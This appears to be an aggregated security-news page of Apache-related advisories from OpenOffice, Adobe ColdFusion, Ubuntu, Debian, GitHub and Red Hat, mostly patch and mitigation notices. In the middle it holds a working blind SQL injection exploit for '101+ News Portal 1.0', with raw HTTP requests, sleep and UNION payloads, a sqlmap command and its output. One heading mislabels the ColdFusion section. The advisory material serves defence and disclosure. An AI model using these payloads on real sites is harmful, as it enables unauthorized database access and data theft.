Apache OpenOffice versions before 4.1.14 may be configured to add an empty entry to the Java class path. This may lead to run arbitrary Java code from the current directory.

CVE-2022-38745

Apache OpenOffice Advisory

**An empty class path may lead to run arbitrary Java code**

**Fixed in Apache OpenOffice 4.1.14**

**Description**

Apache OpenOffice versions before 4.1.14 may be configured to add an empty entry to the Java class path. This may lead to run arbitrary Java code from the current directory.

**Severity: Moderate**

There are no known exploits of this vulnerability.  
A proof-of-concept demonstration does not exist.

Thanks to the reporter for discovering this issue.

**Vendor: The Apache Software Foundation**

**Versions Affected**

All Apache OpenOffice versions 4.1.13 and older are affected.  
OpenOffice.org versions may also be affected.

**Mitigation**

Install Apache OpenOffice 4.1.14 for the latest maintenance and cumulative security fixes. Use the Apache OpenOffice download page.

**Acknowledgments**

The Apache OpenOffice Security Team would like to thank the European Commission's Open Source Programme Office for discovering and reporting this attack vector.

**Further Information**

For additional information and assistance, consult the Apache OpenOffice Community Forums or make requests to the users@openoffice.apache.org public mailing list.

The latest information on Apache OpenOffice security bulletins can be found at the Bulletin Archive page.

Security Home\-> Bulletin\-> CVE-2022-38745

CVE-2022-38745: CVE-2022-38745

Adobe ColdFusion versions 2018 Update 15 (and earlier) and 2021 Update 5 (and earlier) are affected by an Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability that could result in Arbitrary file system read. Exploitation of this issue does not require user interaction, but does require administrator privileges.

Security updates available for Adobe ColdFusion | APSB23-25

Adobe has released security updates for ColdFusion versions 2021 and 2018. These updates resolve critical and important  vulnerabilities that could lead to arbitrary code execution and memory leak.

Adobe is aware that CVE-2023-26360 has been exploited in the wild in very limited attacks targeting Adobe ColdFusion.

Adobe categorizes these updates with the following priority rating and recommends users update their installations to the newest versions:

Adobe recommends updating your ColdFusion JDK/JRE to the latest version of the LTS releases for JDK 11. Applying the ColdFusion update without a corresponding JDK update will NOT secure the server.  See the relevant Tech Notes for more details. 

Adobe  also recommends customers apply the security configuration settings as outlined on the ColdFusion Security page as well as review the respective Lockdown guides.    

*   ColdFusion 2018 Auto-Lockdown guide   
*   ColdFusion 2021 Lockdown Guide

Adobe would like to thank the following for reporting the relevant issues and for working with Adobe to help protect our customers:

*   Patrick Vares (ELS-PHI) - CVE-2023-26359  
    
*   Charlie Arehart and Pete Freitag - CVE-2023-26360  
    
*   Dusan Stevanovic of Trend Micro - CVE-2023-26361  
    

**ColdFusion JDK Requirement**

**COLDFUSION 2021 (version 2021.0.0.323925) and above**

**For Application Servers**   

On JEE installations, set the following JVM flag, "-Djdk.serialFilter= !org.mozilla.\*\*;!com.sun.syndication.\*\*;!org.apache.commons.beanutils.\*\*", in the respective startup file depending on the type of Application Server being used.   

For example:   

Apache Tomcat Application Server: edit JAVA\_OPTS in the ‘Catalina.bat/sh’ file   

WebLogic Application Server:  edit JAVA\_OPTIONS in the ‘startWeblogic.cmd’ file   

WildFly/EAP Application Server:  edit JAVA\_OPTS in the ‘standalone.conf’ file   

Set the JVM flags on a JEE installation of ColdFusion, not on a standalone installation.   

**COLDFUSION 2018 HF1 and above**  

**For Application Servers**   

On JEE installations, set the following JVM flag, "-Djdk.serialFilter= !org.mozilla.\*\*;!com.sun.syndication.\*\*;!org.apache.commons.beanutils.\*\*", in the respective startup file depending on the type of Application Server being used.   

For example:   

Apache Tomcat Application Server: edit JAVA\_OPTS in the ‘Catalina.bat/sh’ file   

WebLogic Application Server:  edit JAVA\_OPTIONS in the ‘startWeblogic.cmd’ file   

WildFly/EAP Application Server:  edit JAVA\_OPTS in the ‘standalone.conf’ file   

Set the JVM flags on a JEE installation of ColdFusion, not on a standalone installation.   

March 14, 2023: Vulnerability Impact revised for CVE-2023-26360

For more information, visit https://helpx.adobe.com/security.html , or email PSIRT@adobe.com

CVE-2023-26361: Adobe Security Bulletin

Ubuntu Security Notice 5942-2 - USN-5942-1 fixed vulnerabilities in Apache HTTP Server. This update provides the corresponding update for CVE-2023-25690 for Ubuntu 16.04 ESM. Lars Krapf discovered that the Apache HTTP Server mod_proxy module incorrectly handled certain configurations. A remote attacker could possibly use this issue to perform an HTTP Request Smuggling attack.

==========================================================================  
Ubuntu Security Notice USN-5942-2  
March 22, 2023

apache2 vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 16.04 ESM

Summary:

Apache HTTP Server could allow unintended access to network services.

Software Description:  
- apache2: Apache HTTP server

Details:

USN-5942-1 fixed vulnerabilities in Apache HTTP Server. This update  
provides the corresponding update for CVE-2023-25690 for Ubuntu 16.04 ESM.

Original advisory details:

  Lars Krapf discovered that the Apache HTTP Server mod_proxy module  
  incorrectly handled certain configurations. A remote attacker could  
  possibly use this issue to perform an HTTP Request Smuggling attack.  
  (CVE-2023-25690)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 16.04 ESM:  
   apache2                         2.4.18-2ubuntu3.17+esm10

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-5942-2  
   https://ubuntu.com/security/notices/USN-5942-1  
   CVE-2023-25690

Ubuntu Security Notice USN-5942-2

When using the RemoteIpFilter with requests received from a reverse proxy via HTTP that include the X-Forwarded-Proto header set to https, session cookies created by Apache Tomcat 11.0.0-M1 to 11.0.0.-M2, 10.1.0-M1 to 10.1.5, 9.0.0-M1 to 9.0.71 and 8.5.0 to 8.5.85 did not include the secure attribute. This could result in the user agent transmitting the session cookie over an insecure channel.

**Apache Tomcat vulnerable to Unprotected Transport of Credentials**

Moderate severity GitHub Reviewed Published Mar 22, 2023 to the GitHub Advisory Database • Updated Mar 22, 2023

GHSA-2c9m-w27f-53rm: Apache Tomcat vulnerable to Unprotected Transport of Credentials

**Email display mode:**

Modern rendering  
Legacy rendering

CVE-2023-28708

Debian Linux Security Advisory 5376-1 - Multiple vulnerabilities have been discovered in the Apache HTTP server, which may result in HTTP response splitting or denial of service.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5376-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffMarch 20, 2023                        https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : apache2CVE ID         : CVE-2006-20001 CVE-2022-36760 CVE-2022-37436 CVE-2023-25690                 CVE-2023-27522Multiple vulnerabilities have been discovered in the Apache HTTP server,which may result in HTTP response splitting or denial of service.For the stable distribution (bullseye), these problems have been fixed inversion 2.4.56-1~deb11u1.We recommend that you upgrade your apache2 packages.For the detailed security status of apache2 please refer toits security tracker page at:https://security-tracker.debian.org/tracker/apache2Further information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmQYqdQACgkQEMKTtsN8TjYWeQ//dwKUtLc9oKmjEmiY1QsRsSYdlzMTWA8ow63vdtGD1QU3Xb/CxPSZ22Oh8zypNP5qtk3m11JA7npd7RNPpF3Gb1V5ebIlKP7GavGBIrGOmvH31hV3IUP4HoXO/mC36BA3twAgyF12HMtdPvj+qaNguYnxXhc02Kt7kl6sq+ybtdCnRnBfJJ2KYXKqtjRedc+HJZa0gSuq9fsFbaQF1OPk1jHEO/ixHhISKhEr1mHO+eLN3soQ9gqaEG/a/0jLUm1ThiBNeK5jkmCXuIuqwwrGHG16Cl9fIKGps1Yb+ef2aJca7onA4IfyUj1d1S7VmCgFFQe+5eAgdcR77mWS8RyEP/lyItY+ifzGG6xR0EUnDgD7ApcqhZBIJCgU583Dle+sjvwgb9iSSeNwynqx58Pf4648AJSx6nNlsop4ekE4To5GvKyr/eI3HNqat9BfVtwqRu4GnnurvJFzh5n2wpRl1JbQMFMx/kxb1He5ioayRtru9guViNA3ylgnd7lbk8FEsvvzS9MM0RVivlWdzD6+FVFHaWoCcwzv+0dFD6iiG5MJMGUr0pElw+juAs6bnKCCoEHU4HK0rKHlVeB6E3Ch7yF+b6PvzZqCqcOE6RB5/I2Nu9S3L78cZWRUnKXf/WHf3Lw+DCB8QKWUBuo0WjkFjmEe/oUCWHGt/UbtXGbSM+E=Bi/w-----END PGP SIGNATURE-----

Debian Security Advisory 5376-1

Excessive Iteration vulnerability in Apache Software Foundation Apache Sling Resource Merger. This issue affects Apache Sling Resource Merger: from 1.2.0 before 1.4.2.

**Apache Sling Resource Merger has Excessive Iteration vulnerability**

High severity GitHub Reviewed Published Mar 20, 2023 to the GitHub Advisory Database • Updated Mar 20, 2023

GHSA-rwrx-x2hw-9h5w: Apache Sling Resource Merger has Excessive Iteration vulnerability

101+ News Portal version 1.0 suffers from a remote blind SQL injection vulnerability.

    # Exploit Title: 101+ News Portal - SQLi# Date: 19/03/2023# Exploit Author: Abdulhakim Öner# Vendor Homepage: https://www.sourcecodester.com# Software Link: https://www.sourcecodester.com/php/16067/best-online-news-portal-project-php-free-download.html# Software Download: https://www.sourcecodester.com/sites/default/files/download/mayuri_k/101news_0.zip# Version: 1.0# Tested on: Windows, Linux## Description A Blind SQL injection vulnerability in the page (/101news/search.php) in 101+ News Portal allows remote unauthenticated attackers to execute remote arbitrary SQL commands through "searchtitle" parameter. ## Request PoC```POST /101news/search.php HTTP/1.1Host: 192.168.1.101Accept-Encoding: gzip, deflateAccept: */*Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36Connection: closeCache-Control: max-age=0Referer: http://192.168.1.101/101news/Content-Type: application/x-www-form-urlencodedContent-Length: 59Cookie: PHPSESSID=o5fslt60dlojncb7jnft04lps9searchtitle=232943'```This request causes an error. Adding "'%2b(select*from(select(sleep(20)))a)%2b'" to the end of "searchtitle" parameter, the response to request was 200 status code with message of OK, but 20 seconds later, which indicates that our sleep 20 command works. ```POST /101news/search.php HTTP/1.1Host: 192.168.1.101Accept-Encoding: gzip, deflateAccept: */*Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36Connection: closeCache-Control: max-age=0Referer: http://192.168.1.101/101news/Content-Type: application/x-www-form-urlencodedContent-Length: 59Cookie: PHPSESSID=o5fslt60dlojncb7jnft04lps9searchtitle=232943'%2b(select*from(select(sleep(20)))a)%2b'```## Exploit with sqlmapSave the request from burp to file ```┌──(root㉿caesar)-[/home/kali/Workstation/multi]└─# sqlmap -r sqli.txt -p 'searchtitle' --batch --dbs --level=3 --risk=2                                           ---snip---POST parameter 'searchtitle' is vulnerable. Do you want to keep testing the others (if any)? [y/N] Nsqlmap identified the following injection point(s) with a total of 114 HTTP(s) requests:---Parameter: searchtitle (POST)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)    Payload: searchtitle=232943' AND 3793=(SELECT (CASE WHEN (3793=3793) THEN 3793 ELSE (SELECT 6168 UNION SELECT 2808) END))-- KdPX    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: searchtitle=232943' AND (SELECT 1460 FROM (SELECT(SLEEP(5)))dqHc)-- zMGY    Type: UNION query    Title: Generic UNION query (NULL) - 8 columns    Payload: searchtitle=232943' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7162787071,0x457444695056617478516b4b4f666e73744162466478444e5061624161514f78726c727777764c6b,0x716a6b6271)-- ----[18:01:02] [INFO] the back-end DBMS is MySQLweb application technology: PHP 8.2.0, Apache 2.4.54back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)[18:01:02] [INFO] fetching database namesavailable databases [5]:[*] information_schema[*] mysql[*] newsportal[*] performance_schema[*] phpmyadmin---snip---```

101+ News Portal 1.0 SQL Injection

Excessive Iteration vulnerability in Apache Software Foundation Apache Sling Resource Merger.This issue affects Apache Sling Resource Merger: from 1.2.0 before 1.4.2.

CVE-2023-26513

Red Hat Security Advisory 2023-1286-01 - Migration Toolkit for Runtimes 1.0.2 Images. Issues addressed include denial of service, privilege escalation, and server-side request forgery vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: Migration Toolkit for Runtimes security bug fix and enhancement update  
Advisory ID:       RHSA-2023:1286-01  
Product:           Migration Toolkit for Runtimes  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1286  
Issue date:        2023-03-16  
CVE Names:         CVE-2021-46848 CVE-2022-2056 CVE-2022-2057   
                   CVE-2022-2058 CVE-2022-2519 CVE-2022-2520   
                   CVE-2022-2521 CVE-2022-2867 CVE-2022-2868   
                   CVE-2022-2869 CVE-2022-2953 CVE-2022-4415   
                   CVE-2022-31690 CVE-2022-35737 CVE-2022-40303   
                   CVE-2022-40304 CVE-2022-41966 CVE-2022-42010   
                   CVE-2022-42011 CVE-2022-42012 CVE-2022-43680   
                   CVE-2022-46364 CVE-2022-47629 CVE-2023-21835   
                   CVE-2023-21843   
=====================================================================

1. Summary:

Migration Toolkit for Runtimes 1.0.2 release

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Description:

Migration Toolkit for Runtimes 1.0.2 Images

Security Fix(es):

* spring-security-oauth2-client: Privilege Escalation in  
spring-security-oauth2-client (CVE-2022-31690)

* xstream: Denial of Service by injecting recursive collections or maps  
based on element's hash values raising a stack overflow (CVE-2022-41966)

* Apache CXF: SSRF Vulnerability (CVE-2022-46364)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

3. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

4. Bugs fixed (https://bugzilla.redhat.com/):

2155682 - CVE-2022-46364 Apache CXF: SSRF Vulnerability  
2162200 - CVE-2022-31690 spring-security-oauth2-client: Privilege Escalation in spring-security-oauth2-client  
2170431 - CVE-2022-41966 xstream: Denial of Service by injecting recursive collections or maps based on element's hash values raising a stack overflow

5. References:

https://access.redhat.com/security/cve/CVE-2021-46848  
https://access.redhat.com/security/cve/CVE-2022-2056  
https://access.redhat.com/security/cve/CVE-2022-2057  
https://access.redhat.com/security/cve/CVE-2022-2058  
https://access.redhat.com/security/cve/CVE-2022-2519  
https://access.redhat.com/security/cve/CVE-2022-2520  
https://access.redhat.com/security/cve/CVE-2022-2521  
https://access.redhat.com/security/cve/CVE-2022-2867  
https://access.redhat.com/security/cve/CVE-2022-2868  
https://access.redhat.com/security/cve/CVE-2022-2869  
https://access.redhat.com/security/cve/CVE-2022-2953  
https://access.redhat.com/security/cve/CVE-2022-4415  
https://access.redhat.com/security/cve/CVE-2022-31690  
https://access.redhat.com/security/cve/CVE-2022-35737  
https://access.redhat.com/security/cve/CVE-2022-40303  
https://access.redhat.com/security/cve/CVE-2022-40304  
https://access.redhat.com/security/cve/CVE-2022-41966  
https://access.redhat.com/security/cve/CVE-2022-42010  
https://access.redhat.com/security/cve/CVE-2022-42011  
https://access.redhat.com/security/cve/CVE-2022-42012  
https://access.redhat.com/security/cve/CVE-2022-43680  
https://access.redhat.com/security/cve/CVE-2022-46364  
https://access.redhat.com/security/cve/CVE-2022-47629  
https://access.redhat.com/security/cve/CVE-2023-21835  
https://access.redhat.com/security/cve/CVE-2023-21843  
https://access.redhat.com/security/updates/classification/#important

6. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZBMyj9zjgjWX9erEAQjYeQ//UuRPtn96y1y86Oy3h22AOmgbhm+14j0E  
QdVf/7R+cdOrhTh/U8Q0J+TyB69aqqFkPkt13hK55C6/GR+BF3hxsmEeYPEU09XA  
4b0lfu9Wx+o707zPB6PRhMA8nNAnXfkeu9LNGSHY/jLBug6KXSlyQ9/h0HWB4j19  
xFdUUlfW2wDjzV8j697garKk6oGY+3VOMF3RbD35EWCSOdLrX3aY+tsqunk0dCMJ  
GE7uHxqoDtYNWnQAQnd4gCydhl1RRGq2tzY1OClEZ4/zpFQWs3nLIkeUCGs+mCfk  
gp8tz+/zyytxSa/Oweak6Z50UC2qlYonPAH8883E181un0vq2NMeJdNlBzPnlO3P  
ebUZgoS1jE07BN/rack9NBUjnTQ8t/vpeDavjjhQPgjsiSUcrQwSR4YhckbKz07B  
muvOo6vz645punZ+BwYMvjT9XAR9Tx5JfuureeQOVvi3iiGgiR4cfreKXX/Xt2gh  
/7ALcDeV05P41SN6d+z7fvEaXpdYwSs2H4Wbf+oEpV9FUockEElrYSOYrZVQ6Muh  
H6m/hboerV8SBn3JrM3egj+sXZw4pCitrotFQB1HM6/duS5uY0m0dDAaCR8DCJcL  
qV6cNHOBjtXYAxxextdcrbF+IwoGWDrOuifIL2OSQgT/Qvh0AaSAWe+FCNPHfIJY  
MW3fEoqdc88=  
=4fmY  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Tag

#apache